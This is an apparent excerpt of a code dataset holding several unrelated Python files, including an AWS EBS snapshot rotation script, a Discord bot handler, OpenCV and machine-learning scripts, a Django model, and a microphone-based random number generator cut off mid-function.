__name__ == \"__main__\":\n main()\n","sub_path":"scripts/needs_rebuild.py","file_name":"needs_rebuild.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"293392780","text":"from typing import Dict\n\nimport cv2\nimport numpy as np\nfrom PIL import ImageDraw, ImageFont, Image\nfrom sklearn.preprocessing import LabelEncoder\n\nimport common\nfrom box_extractors import Extractor\nfrom classifier import common_class_merger\nfrom model import Model\nfrom pipeline import Step\n\n\nclass Input(Step):\n def __init__(self, name: str):\n super().__init__(name)\n\n def perform(self, data: Dict):\n return {\n \"input_frame\": data[list(data.keys())[0]]\n }\n\n\nclass DetectingSingleFrameStep(Step):\n def __init__(self, name: str, model: Model, extractor: Extractor):\n super().__init__(name)\n self.model = model\n self.extractor = extractor\n self.required_keys = [\"input_frame\"]\n\n def perform(self, data: Dict) -> Dict:\n self.check_for_necessary_keys(data)\n input_frame = data[\"input_frame\"]\n expanded_input_frame = np.expand_dims(input_frame, axis=0)\n detected_boxes = self.model.predict(expanded_input_frame)\n detected_boxes = np.squeeze(detected_boxes, axis=0)\n output_frames = self.extractor.extract(input_frame, detected_boxes)\n return {\n \"boxes\": output_frames,\n \"boxes_coordinates\": detected_boxes\n }\n\n\nclass ClassifyingBoxesStep(Step):\n def __init__(self, name: str, model: Model, input_width: int, input_height: int):\n super().__init__(name)\n self.model = model\n self.input_width = input_width\n self.input_height = input_height\n self.required_keys = [\"boxes\"]\n\n def perform(self, data: Dict) -> Dict:\n self.check_for_necessary_keys(data)\n input_data = data[\"boxes\"]\n preprocessed_boxes = []\n classes = []\n probas = []\n for box in input_data:\n box = cv2.resize(box, (self.input_width, self.input_height))\n box = cv2.cvtColor(cv2.cvtColor(box, cv2.COLOR_BGR2GRAY), cv2.COLOR_GRAY2BGR)\n preprocessed_boxes.append(box)\n if len(preprocessed_boxes) > 0:\n preprocessed_boxes = np.asarray(preprocessed_boxes, dtype=np.float32)\n classes, probas = self.model.predict(preprocessed_boxes)\n return {\n \"predicted_classes\": classes,\n \"predicted_probabilities\": probas\n }\n\n\nclass DecodeClassesStep(Step):\n\n def __init__(self, name: str, label_encoder: LabelEncoder):\n super().__init__(name)\n self.le = label_encoder\n self.required_keys = [\"predicted_classes\"]\n\n def perform(self, data: Dict) -> Dict:\n self.check_for_necessary_keys(data)\n input_data = data[\"predicted_classes\"]\n classes_names = self.le.inverse_transform(input_data)\n classes_names = common_class_merger.merge(classes_names)\n return {\n \"classes_names\": classes_names\n }\n\n\nclass VisualiseStep(Step):\n def __init__(self, name: str):\n super().__init__(name)\n self.required_keys = [\"input_frame\", \"boxes\", \"predicted_classes\"]\n\n def perform(self, data: Dict) -> Dict:\n self.check_for_necessary_keys(data)\n input_frame = data[\"input_frame\"]\n boxes = data[\"boxes_coordinates\"]\n predicted_classes = data[\"classes_names\"]\n image = Image.fromarray(input_frame)\n if len(boxes) > 0:\n draw = ImageDraw.Draw(image)\n font = ImageFont.truetype(font=common.FONT_PATH.as_posix(),\n size=np.floor(3e-2 * image.size[1] + 0.5).astype(np.int32))\n thickness = (image.size[0] + image.size[1]) // 500 # thickness of the bounding box border\n for (left, top, right, bottom), cls in zip(boxes, predicted_classes):\n\n label_size = 
draw.textsize(cls, font)\n if top - label_size[1] >= 0:\n text_origin = np.array([left, top - label_size[1]])\n else:\n text_origin = np.array([left, top + 1])\n\n # My kingdom for a good redistributable image drawing library.\n color = (0, 255, 0) if cls != common.NO_SIGN_CLASS else (2, 106, 253)\n for j in range(thickness):\n draw.rectangle([left + j, top + j, right - j, bottom - j], outline=color)\n draw.rectangle([tuple(text_origin), tuple(text_origin + label_size)], fill=color)\n draw.text(text_origin, cls, fill=(0, 0, 0), font=font)\n\n return {\n \"visualised\": np.asarray(image)\n }\n\n\nclass ShowVisualisation(Step):\n def __init__(self, name: str):\n super().__init__(name)\n self.required_keys = [\"visualised\"]\n\n def perform(self, data: Dict) -> Dict:\n self.check_for_necessary_keys(data)\n visualised = data[\"visualised\"]\n cv2.imshow('frame', visualised)\n return {}\n","sub_path":"src/steps.py","file_name":"steps.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"352255897","text":"import re\nimport os\n\nfrom discord import channel\n\nfrom disco import bot, constants, utils\n\n\n@bot.listen()\nasync def on_message(message):\n if message.author == bot.user:\n return\n\n if isinstance(message.channel, channel.PrivateChannel):\n if not message.attachments:\n match = re.match(constants.RE_ATTACHMENT_URI, message.content)\n if match is not None:\n owner_name = match.group(1)\n filename = match.group(2)\n\n path = os.path.join('attachments', owner_name, filename)\n if message.author.name == owner_name and os.path.exists(path):\n await bot.send_message(\n message.channel, 'Deleting %s...' % filename)\n os.remove(path)\n dirname = os.path.dirname(path)\n if not os.listdir(dirname):\n os.rmdir(dirname)\n return\n\n uris = []\n path = os.path.join('attachments', message.author.name)\n if os.path.exists(path):\n for filename in os.listdir(path):\n uri = utils.make_attachment_uri(\n message.author.name, filename)\n uris.append(uri)\n quote = 'That attachment does not exist!\\n\\nIf you wish to ' \\\n 'delete one of your submitted attachments, you must ' \\\n 'provide its URI. '\n if uris:\n quote += 'Here is a list of all of your submitted ' \\\n 'attachments:\\n' + '\\n'.join(uris)\n else:\n quote += 'You currently have no submitted attachments.'\n await bot.send_message(message.channel, quote)\n return\n\n for attachment in message.attachments:\n filename = attachment['filename']\n\n ext = os.path.splitext(filename)[1]\n if ext not in constants.VALID_ATTACHMENT_TYPES:\n await bot.send_message(\n message.channel,\n 'File type %s is not supported! It must be one of the '\n 'following: %s' %\n (ext, ', '.join(constants.VALID_ATTACHMENT_TYPES)))\n continue\n\n await bot.send_message(\n message.channel, 'Downloading %s...' % filename)\n uri = await bot.download_attachment(message.author, attachment)\n await bot.send_message(\n message.channel,\n 'Done! To play this attachment, use: %s play %s' %\n (bot.user.mention, uri))\n","sub_path":"disco/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"384527145","text":"#!/usr/bin/env python3.5\n\"\"\"\n\nTag your instance and/or volumes with:\n Snapshot: yes|Yes\n\nYou can also pass instance ID or snapshot ALL (default).\n\nIt uses boto just like ansible, and you don't need to specify\ncredentials. 
You can use multiple boto profiles as described here:\n\nhttp://boto.cloudhackers.com/en/latest/boto_config_tut.html\n\nArguments:\n ALL arguments are optional.\n -v VERBOSE mode\n -h help\n -i <instance_id[,instance_id,...]>\n -p <boto_profile>, default: default\n -t <tag_name>, default: Snapshot\n -n <1..1000>, default: 15, number of snapshots to keep for each volume\n -l <1..1000>, default: 24, number of hours that will elapse before creating a new snapshot\n\n\nExamples:\n python snapshot_instances.py\n This will snapshot all volumes of all instances, keeping 15 snapshots\n creating a new one every day\n\n python snapshot_instances.py -i i-342abc3\n This will snapshot all volumes of i-342abc3, keeping 15 snapshots\n creating a new one every day\n\n python snapshot_instances.py -i i-342abc3,i-342abc4,i-213abc2\n This will snapshot all volumes of i-342abc3, i-342abc4 and i-213abc2,\n keeping 15 snapshots and creating a new one every day\n\n python snapshot_instances.py -p work -n 4 -l 168\n Snapshot all instances in your work profile, creating one snapshot\n per week, for 4 weeks\n\n python snapshot_instances.py -v\n Same as the first example, printing status as it goes.\n\"\"\"\n\nimport sys\nfrom datetime import timedelta\nimport datetime\nimport getopt\nimport boto\nimport boto.ec2\nimport dateutil.parser\nfrom dateutil import tz\n\nBOTO_PROFILE = ''\nNUMBER_SNAPSHOTS = 15\nLIFETIME = 24\nTAG = 'Snapshot'\n# LIFETIME is the number of hours minimum to create a new snapshot\n# defaults to 1 per day\n\nINSTANCE_IDS = ''\nAWS_CONN = None\nVERBOSE = False\n\nCHECKED_VOLUMES = list()\n\n\ndef parse_args(argv):\n \"\"\"\n Basic arg parsing\n \"\"\"\n\n global BOTO_PROFILE, NUMBER_SNAPSHOTS, LIFETIME, INSTANCE_IDS, VERBOSE, TAG\n try:\n opts, _ = getopt.getopt(argv, \"t:p:n:l:i:vh\")\n except getopt.GetoptError:\n print(\"Error parsing options\")\n help()\n sys.exit(1)\n\n for opt, arg in opts:\n if opt == '-p':\n BOTO_PROFILE = arg\n elif opt == '-t':\n TAG = arg\n elif opt == '-h':\n help()\n sys.exit(0)\n elif opt == '-v':\n VERBOSE = True\n elif opt == '-n':\n try:\n NUMBER_SNAPSHOTS = int(arg)\n if NUMBER_SNAPSHOTS < 1 or NUMBER_SNAPSHOTS > 1000:\n NUMBER_SNAPSHOTS = 10\n raise ValueError(\"Incorrect number of snapshots\")\n except:\n print(\"Incorrect number of snapshots, using default %s\" %\n NUMBER_SNAPSHOTS)\n elif opt == '-l':\n try:\n LIFETIME = int(arg)\n if LIFETIME < 1 or LIFETIME > 1000:\n LIFETIME = 24\n raise ValueError(\"Incorrect LIFETIME(-l) value\")\n except:\n print(\"Invalid -l argument, using default %s\" % LIFETIME)\n elif opt == '-i':\n if ',' in arg:\n INSTANCE_IDS = arg.split(',')\n else:\n INSTANCE_IDS = [arg]\n else:\n print(\"Bad option: %s\" % opt)\n\n\ndef traverse_instances():\n \"\"\"\n traverse instances\n \"\"\"\n global conn, INSTANCE_IDS, TAG\n reservations = conn.get_all_reservations()\n for res in reservations:\n for i in res.instances:\n if i.id in INSTANCE_IDS:\n INSTANCE_IDS.remove(i.id)\n traverse_all_volumes_for_instance(i)\n if len(INSTANCE_IDS) > 0:\n print(\"\\nError: the following instance ids were NOT found: %s\" %\n INSTANCE_IDS)\n\n\ndef traverse_all_instances_with_tag():\n global conn\n reservations = conn.get_all_reservations()\n for r in reservations:\n for i in r.instances:\n for tag in i.tags:\n if tag == TAG:\n if i.tags[tag] in [\"yes\", \"Yes\"]:\n traverse_all_volumes_for_instance(i)\n elif i.tags[tag] != '':\n print(\"Invalid value for tag: %s, on %s\" % (i.tags[tag], i.id))\n\n\ndef traverse_all_volumes_with_tag():\n global conn, VERBOSE, TAG\n print(\"Volumes with tag:\")\n volumes = 
conn.get_all_volumes(filters={'tag:' + TAG: ['yes', 'Yes']})\n for v in volumes:\n check_n_snapshot_volume(v)\n\n\ndef traverse_all_volumes_for_instance(instance_obj):\n global conn, VERBOSE\n\n if 'Name' in instance_obj.tags:\n print(\"Instance: %s, Name: %s\" %\n (instance_obj.id, instance_obj.tags['Name']))\n else:\n print(\"Instance: %s\" % instance_obj.id)\n volumes = conn.get_all_volumes(\n filters={'attachment.instance-id': instance_obj.id})\n for v in volumes:\n check_n_snapshot_volume(v)\n\n\ndef check_n_snapshot_volume(volume_obj):\n global conn, NUMBER_SNAPSHOTS, VERBOSE, CHECKED_VOLUMES\n\n # don't check the same volume more than once\n if volume_obj.id in CHECKED_VOLUMES:\n return\n\n if VERBOSE:\n if 'Name' in volume_obj.tags:\n print(\" Volume: %s, Name: %s\" %\n (volume_obj.id, volume_obj.tags['Name']))\n else:\n print(\" Volume: %s\" % volume_obj.id)\n\n # first delete snapshots if necessary\n snapshots = volume_obj.snapshots()\n ordered_snaps = sorted(snapshots,\n key=lambda vol: vol.start_time, reverse=True)\n if len(snapshots) >= NUMBER_SNAPSHOTS:\n while (len(ordered_snaps) >= NUMBER_SNAPSHOTS):\n del_snap = ordered_snaps.pop()\n print(\" Deleting snapshot: %s, description: %s\" % (\n del_snap.id, del_snap.description))\n try:\n del_snap.delete()\n except:\n print(\"\\tSnapshot not deleted, used by AMI ?\")\n\n now = datetime.datetime.now(tz.tzlocal())\n clock = now - timedelta(hours=LIFETIME)\n\n # create a snapshot if the time is right\n if len(ordered_snaps) > 0:\n newest = ordered_snaps.pop(0)\n start_time = dateutil.parser.parse(newest.start_time)\n\n if start_time < clock:\n snapshot_volume(volume_obj)\n elif VERBOSE:\n print(\" Recent snapshot found: %s, %s\" %\n (newest.id, newest.description))\n # create snapshot if the instance doesn't have one\n else:\n snapshot_volume(volume_obj)\n\n CHECKED_VOLUMES.append(volume_obj.id)\n\n\ndef snapshot_volume(volume_obj):\n now = datetime.datetime.now()\n desc = volume_obj.id + now.strftime(\"_%Y-%m-%d\")\n print(\" Creating snapshot %s\" % desc)\n volume_obj.create_snapshot(desc)\n\n\ndef help():\n global NUMBER_SNAPSHOTS, LIFETIME, BOTO_PROFILE\n print(\"\"\"\nUse:\n -n <number of snapshots to keep, default %s>\n -l <hours before a new snapshot, default %s>\n -t <tag name>, default 'Snapshot'\n -p <boto profile, default '%s'>\n -i <instance_id[,instance_id,...]>\n -v VERBOSE mode\n\"\"\" % (NUMBER_SNAPSHOTS, LIFETIME, BOTO_PROFILE))\n\n\nif __name__ == \"__main__\":\n parse_args(sys.argv[1:])\n instances = 'all'\n if type(INSTANCE_IDS) is list:\n instances = str(INSTANCE_IDS)\n if VERBOSE:\n print(\"\"\"Using boto profile: %s\nNumber of snapshots to keep for each volume: %s\nNumber of hours before creating a new snapshot: %s\nInstances to consider: %s\nTag: %s\n\"\"\" % (BOTO_PROFILE, NUMBER_SNAPSHOTS, LIFETIME, 'tagged' if instances == 'all' else instances, TAG))\n\n regions = ['us-east-1', 'us-west-1', 'us-west-2']\n for region in regions:\n print(\"Checking region '%s':\" % region)\n if len(BOTO_PROFILE) > 0:\n conn = boto.ec2.connect_to_region(region, profile_name=BOTO_PROFILE)\n else:\n conn = boto.ec2.connect_to_region(region)\n\n if len(INSTANCE_IDS) > 0:\n traverse_instances()\n else:\n traverse_all_instances_with_tag()\n traverse_all_volumes_with_tag()\n","sub_path":"python/aws_snapshot.py","file_name":"aws_snapshot.py","file_ext":"py","file_size_in_byte":8333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"431667105","text":"from ..fasttext.fasttext import FastText\nfrom ...utils.tools import Tools\nimport os, sys\n\nlog = Tools.get_logger('fasttext char')\n\nclass FastTextChar:\n def __init__(self, epoch=100, thread=30, dim=128, lr=0.05, update_rate=100, topk=5):\n self.topk = topk\n cur_path = os.path.dirname(os.path.realpath(__file__))\n if not os.path.exists(cur_path + '/model'):\n os.mkdir(cur_path + '/model')\n if not os.path.exists(cur_path + '/data'):\n os.mkdir(cur_path + '/data')\n model = 'model_{}_{}_{:.2f}_{}'.format(epoch, dim, lr, update_rate)\n self.obj = FastText(cur_path, 'char', epoch, thread, dim, lr, update_rate, model)\n\n def train(self):\n log.info('begin train')\n self.obj.train()\n log.info('end train')\n\n def test(self):\n log.info('begin test')\n self.obj.test(topk=self.topk)\n log.info('end test')\n\n def eval(self):\n log.info('begin eval')\n self.obj.eval(topk=self.topk)\n log.info('end eval')\n\nif __name__ == '__main__':\n ftc = FastTextChar(epoch=300, thread=30, dim=256, lr=0.5, update_rate=100, topk=5)\n if len(sys.argv) > 2:\n epoch = int(sys.argv[1])\n thread = int(sys.argv[2])\n dim = int(sys.argv[3])\n lr = float(sys.argv[4])\n update_rate = int(sys.argv[5])\n ws = int(sys.argv[6])\n neg = int(sys.argv[7])\n ftc = FastTextChar(epoch=epoch,\n thread=thread,\n dim=dim,\n lr=lr,\n update_rate=update_rate,\n ws=ws,\n neg=neg)\n if sys.argv[8] == 'train' or sys.argv[8] == 'all':\n ftc.train()\n if sys.argv[8] == 'test' or sys.argv[8] == 'all':\n ftc.test()\n if sys.argv[8] == 'eval' or sys.argv[8] == 'all':\n ftc.eval()\n","sub_path":"zhihu/models/fasttext_char/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"249361522","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractBaseUser\nfrom django.core import validators\nfrom common.models import BaseModel\n\n# Create your models here.\n\n\nclass User(AbstractBaseUser, BaseModel):\n\n # authentication attributes\n\n username = models.CharField(help_text='A unique name used to login to the system.',\n max_length=255, unique=True,\n validators=[validators.RegexValidator(r'^[\\w.@+-]+$',\n 'Enter a valid username, which means less than '\n '30 characters consisting of letters, numbers, '\n 'or these symbols: @ +-_.',\n 'invalid'), ],\n error_messages={'unique': \"Sorry, that username is already in use.\"})\n\n email = models.EmailField(help_text='A unique and valid email address.',\n unique=True,\n error_messages={'unique': \"Sorry, that email is already in use.\"})\n\n\n\n #profile attributes\n\n first_name = models.CharField(max_length=30, blank=True, null=True)\n\n last_name = models.CharField(max_length=30, blank=True, null=True) \n \n","sub_path":"auth/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"362460237","text":"import argparse\nimport numpy as np\nimport cv2\n\nGREEN = 60\nBLUE = 120\nYELLOW = 30\n\nSENSITIVITY = 15\n\n\ndef grey_histogram(img):\n hist = cv2.calcHist([img], [0], None, [256], [0, 256])\n return hist\n\n\ndef extract_bright(img):\n grey_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n [minVal, maxVal, minLoc, maxLoc] = cv2.minMaxLoc(grey_img)\n margin = 0.80\n\n thresh = int(maxVal * margin) # in pix value to be extracted\n _, thresholdImage = cv2.threshold(grey_img, thresh, 255, 
cv2.THRESH_BINARY)\n\n return thresholdImage\n\n\ndef mask_image(image, color):\n lower_color = np.array([color - SENSITIVITY, 100, 100])\n upper_color = np.array([color + SENSITIVITY, 255, 255])\n\n mask = cv2.inRange(image, lower_color, upper_color)\n # output_image = cv2.bitwise_and(image, image, mask=mask)\n # return output_image\n return mask\n\n\ndef red_mask_image(image):\n lower_red_0 = np.array([0, 100, 100])\n upper_red_0 = np.array([SENSITIVITY, 255, 255])\n lower_red_1 = np.array([180 - SENSITIVITY, 100, 100])\n upper_red_1 = np.array([180, 255, 255])\n\n mask_0 = cv2.inRange(image, lower_red_0, upper_red_0)\n mask_1 = cv2.inRange(image, lower_red_1, upper_red_1)\n\n mask = cv2.bitwise_or(mask_0, mask_1)\n # output_image = cv2.bitwise_and(image, image, mask=mask)\n # return output_image\n return mask\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument(\"-v\", \"--video_path\", dest='video_path', required=True)\n parser.add_argument(\"-o\", \"--output_dir\", dest='output_dir', required=False)\n\n args = parser.parse_args()\n\n cap = cv2.VideoCapture(args.video_path)\n\n while(cap.isOpened()):\n ret, frame = cap.read()\n if ret:\n frame = cv2.GaussianBlur(frame, (5, 5), 0)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n green_mask = mask_image(frame, GREEN)\n red_mask = red_mask_image(frame)\n\n all_mask = cv2.bitwise_or(green_mask, red_mask)\n masked = cv2.bitwise_and(frame, frame, mask=all_mask)\n\n cv2.namedWindow('masked', cv2.WINDOW_NORMAL)\n cv2.imshow('masked', masked)\n\n thresh = extract_bright(masked)\n\n im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 3)\n\n # cv2.drawContours(frame, contours, -1, (0, 0, 255), 3)\n cv2.namedWindow('frame', cv2.WINDOW_NORMAL)\n cv2.imshow('frame', frame)\n\n cv2.namedWindow('thresshold', cv2.WINDOW_NORMAL)\n cv2.imshow('thresshold', thresh)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/video_led_recognizer.py","file_name":"video_led_recognizer.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"306822449","text":"import torch\nimport torch.nn as nn\n\n# %%\nmodel_1 = nn.Linear(10, 10)\nmodel_2 = nn.Linear(10, 1)\n\nopt = torch.optim.Adam(model_2.parameters())\nloss_func = nn.MSELoss()\nx1_w = model_1.weight\n# %%\nx = torch.randn(size=(265, 10))\ny = torch.randn(size=(265, 1))\nfor i in range(2):\n x_1 = model_1(x)\n x_2 = model_2(x_1)\n loss = loss_func(x_2, y)\n assert torch.all(model_1.weight == x1_w)\n opt.zero_grad()\n loss.backward()\n opt.step()","sub_path":"Cgan4StrategyFinetune/check_pytorch_grad.py","file_name":"check_pytorch_grad.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"612593193","text":"'''\nCreated on Jun 22, 2017\n\n@author: lubo\n'''\nimport os\n\nimport pytest\n\nfrom sgains.config import Config\nfrom sgains.genome import Genome\nimport pandas as pd\n\n\n@pytest.fixture(scope='session')\ndef tests_config():\n config = Config.load(\"tests/data/scpipe_tests.yml\", use_config_dir=True)\n return config\n\n\n@pytest.fixture(scope='session')\ndef hg(tests_config):\n 
return Genome(tests_config)\n\n\n@pytest.fixture(scope='session')\ndef bin_boundaries(tests_config):\n bins_boundaries_fixture = os.path.join(\n tests_config.abspath(\n \"test_data/R100_B10k/hg19_R50_B20k_bins_boundaries.txt\")\n )\n df = pd.read_csv(\n bins_boundaries_fixture, sep='\\t')\n return df\n\n\n@pytest.fixture(scope='session')\ndef gc_bin_boundaries():\n gc_bins_boundaries_fixture = os.path.join(\n os.path.abspath(os.path.dirname(__file__)),\n \"data/varbin.gc.content.bowtie.txt\"\n )\n df = pd.read_csv(gc_bins_boundaries_fixture, sep='\\t')\n return df\n\n\n@pytest.fixture(scope='session')\ndef varbin_counts():\n fixture_filename = os.path.join(\n os.path.abspath(os.path.dirname(__file__)),\n \"data/varbin.txt\"\n )\n df = pd.read_csv(fixture_filename, sep='\\t')\n return df\n\n\n@pytest.fixture(scope='session')\ndef varbin0918():\n fixture_filename = os.path.join(\n os.path.abspath(os.path.dirname(__file__)),\n \"data/CJA0918.varbin.txt\"\n )\n df = pd.read_csv(fixture_filename, sep='\\t')\n return df\n","sub_path":"sgains/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"247124194","text":"def isIPV4(string):\n if \".\" not in string:\n return False\n else:\n ipAddressValues = [int(number) for number in string.split(\".\")]\n if (len(ipAddressValues)!= 4):\n return False\n else:\n for i in range(4):\n if (ipAddressValues[i] < 0) or (ipAddressValues[i] > 255):\n return False\n return True\n\ndef isIPV6(string):\n if \":\" not in string:\n return False\n else:\n ipAddressValues = string.split(\":\")\n if (len(ipAddressValues) != 8):\n return False\n else:\n for i in range(8):\n if len(ipAddressValues[i])>4:\n return False\n try:\n (int(ipAddressValues[i], 16) <0) or (int(ipAddressValues[i],16) > 65535)\n except ValueError:\n return False\n return True\n\nnumberOfInputs = int(input())\ninputlist = []\nfor i in range(numberOfInputs):\n userinput = input()\n inputlist.append(userinput)\n\nfor i in range(numberOfInputs):\n if (isIPV4(inputlist[i]) == True):\n print(\"IPV4\")\n elif (isIPV6(inputlist[i]) == True):\n print(\"IPV6\")\n else:\n print(\"Neither\")\n","sub_path":"ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"218309183","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import tree\r\nfrom sklearn.model_selection import train_test_split\r\nimport graphviz\r\nimport pydotplus\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import KFold\r\nimport os\r\nos.chdir('G:\\\\VM_SYNC\\\\JYT-ML\\\\HW1')\r\n\r\n\r\ndata = pd.read_csv('googleplaystore.csv').dropna()\r\n\r\ntrain = data\r\n\r\nclf = tree.DecisionTreeClassifier()\r\nlabels = ['Rating','Reviews','Installs','Price']\r\n\r\na = [x.replace(',', '') for x in [x.strip('+') for x in train['Installs']]]\r\ntrain_installs = [float(x) for x in a]\r\ntrain_Rating = [float(x) for x in train['Rating']]\r\ntrain_Reviews = [float(x) for x in train['Reviews']]\r\ntrain_price = [ float(x.replace('$', '')) for x in train['Price']]\r\n\r\ndf_train = np.column_stack(([train_Rating,train_Reviews,train_installs,train_price]))\r\n\r\ncols = ['Category', 'Genres', 'Content Rating']\r\n\r\nKFoldconst = 10\r\nkf = KFold(n_splits=KFoldconst)\r\nkf.get_n_splits(df_train)\r\n\r\nfor idx in cols:\r\n 
accuracy = 0\r\n for train_index, test_index in kf.split(df_train):\r\n #print(\"TRAIN:\", train_index, \"TEST:\", test_index)\r\n T = np.array(train[idx])\r\n X_train, X_test = df_train[train_index], df_train[test_index]\r\n Y_train, Y_test = T[train_index], T[test_index] \r\n #print( type(X_train) , type(Y_train))\r\n \r\n clf = clf.fit( X_train, Y_train )\r\n Y_predict = clf.predict(X_test)\r\n \r\n accuracy += accuracy_score(Y_test, Y_predict)\r\n print(idx ,':K-fold accuracy is ',accuracy/KFoldconst)\r\n \r\n #pydotplus.graph_from_dot_data(dot_data).write_png(\"tree2.png\")\r\n","sub_path":"HW1/ML with testresult/kfold_google.py","file_name":"kfold_google.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"90568526","text":"import math\nimport struct\nimport matplotlib.pyplot as plt\nimport pyaudio\nimport numpy as np\nimport time\n\n'''\nRuntime and sample generation:\nThe time needed to generate 8-bit numbers based only on the microphone samples depends on the microphone's\nsampling-rate settings and in my case amounts to 44100 numbers/second\nThe time needed to generate 8-bit numbers from already captured microphone samples, processing them\naccording to the approach presented in the paper 'A True Random Number Generator Based on Hyperchaos and Digital Sound',\nis about 132000 numbers/second on my laptop\n'''\n\n# function generating numbers from the microphone alone (without the processing algorithm)\ndef getAudio(numOfSamples):\n\tCHUNK = 1024\n\tFORMAT = pyaudio.paInt16\n\tCHANNELS = 1\n\tRATE = 44100 # 44.1kHz\n\tp = pyaudio.PyAudio()\n\tstream = p.open(\n\t\tformat=FORMAT,\n\t\tchannels=CHANNELS,\n\t\trate=RATE,\n\t\tinput=True,\n\t\toutput=True,\n\t\tframes_per_buffer=CHUNK,\n\t\tinput_device_index=2 # USB headset; has to be set explicitly, otherwise the laptop microphone is used\n\t)\n\tcounter = 0\n\tsamples = []\n\twhile counter < numOfSamples:\n\t\tdata = stream.read(CHUNK) # ::2 so there is no return to zero; every second element is taken\n\t\tdata_int = np.array(struct.unpack(str(2 * CHUNK) + 'B', data), dtype='b')[::2] + 128\n\t\tfor i in range(len(data_int)):\n\t\t\tsamples.append(data_int[i])\n\t\t\tcounter +=1\n\treturn samples\n\ndef fT(x, a=1.999999):\n\tif 0<=x<=0.5:return a*x\n\telif 0.5<=x<=1:return a * (1-x)\n\treturn 1 # in case x has a bad value, but this situation never occurs\n\ndef swap(string): # split the string in half; the reversed second half comes first, followed by the first half\n\ts = len(string)//2\n\toutputStr = string[:s-1:-1] + string[s-1::-1] # from:to:step\n\treturn outputStr\n\ndef xorStr(str1, str2):\n\tif len(str1) != len(str2):return False\n\toutStr = \"\"\n\tfor d in range(len(str1)):\n\t\tif str1[d] == str2[d]: outStr+='0'\n\t\telse:outStr +='1'\n\treturn outStr\n\n'''The target algorithm itself. 
I could have further optimized the number of samples taken from the microphone, because to generate N\nrandom numbers only n=(N//32) audio samples are needed, so there is no need (if I want to generate x random numbers in total)\nto wait (x/44100) seconds for x audio samples; offsetLeft + (n * (x/N)) + offsetRight samples would be enough, but I did it without \noptimization in order to show the original numbers from the audio without processing and the numbers after processing on one plot.\n'''\ndef TRNG(inputSampleArr, howMany = 100000, startSample=1000, N=256 ):\n\n\tif len(inputSampleArr)< startSample:return [] # in case too few samples come in\n\t#N = 256 # required TRNG output bits\n\tL = 8 # CCML size\n\ty = L // 2 # required number of iterations\n\t# a row represents time t; below are the initial values for t=0\n\txArr = [[0.141592, 0.653589, 0.793238, 0.462643, 0.383279, 0.502884, 0.197169, 0.399375]]\n\tfor i in range(1, y + 1):\n\t\txArr.append([0] * 8) # fill with zeros so values can be inserted and computed smoothly later\n\tn = (N * L) // ((L // 2) * 64) # number of audio samples (N//32)\n\t#print(\"n: \", n)\n\teps = 0.05 # coupling constant\n\tcounter = 0\n\toutput = []\n\twith open(\"TRNG32BitNumbers.bin\", 'ab') as binFile:\n\t\tbinFile.truncate(0) # clear the contents of TRNG32BitNumbers.bin if the file already has any\n\t\twhile counter*N < howMany:\n\t\t\tr = [] # r ^ y - a 3-bit number from an audio sample\n\t\t\tA = inputSampleArr[startSample: startSample + L] # array of audio samples; I do not start from sample zero\n\t\t\tfor i in range(n): # this was n before\n\t\t\t\tmask = 1\n\t\t\t\ttempNum = 0\n\t\t\t\tfor k in range(3):\n\t\t\t\t\ttempNum += A[i] & mask\n\t\t\t\t\tmask <<= 1\n\t\t\t\tr.append(tempNum) # append the 3-bit number to the array r\n\n\t\t\tt = 0 # serves as a kind of time index\n\t\t\tNCounter = 0 # counts whether N (256) samples have been generated in the while loop below\n\t\t\twhile NCounter < N: # 10 s / 100000 numbers\n\t\t\t\tfor i in range(L): # here t=0\n\t\t\t\t\txArr[t][i] = ((0.071428571 * r[i]) + xArr[t][i]) * (2/3)\n\t\t\t\tfor t in range(y): # y=4\n\t\t\t\t\tfor i in range(L):\n\t\t\t\t\t\t#print(\"t: \", t, \"i: \", i, \"xArr[i][t]: \", xArr[t][i])\n\t\t\t\t\t\txArr[t+1][i] = ((1-eps) * fT(xArr[t][i])) + ( (eps/2) * ( fT(xArr[t][(i+1)%L] ) + fT(xArr[t][(i-1)%L])))\n\t\t\t\tzArr = [] # 8 strings of 64 bits 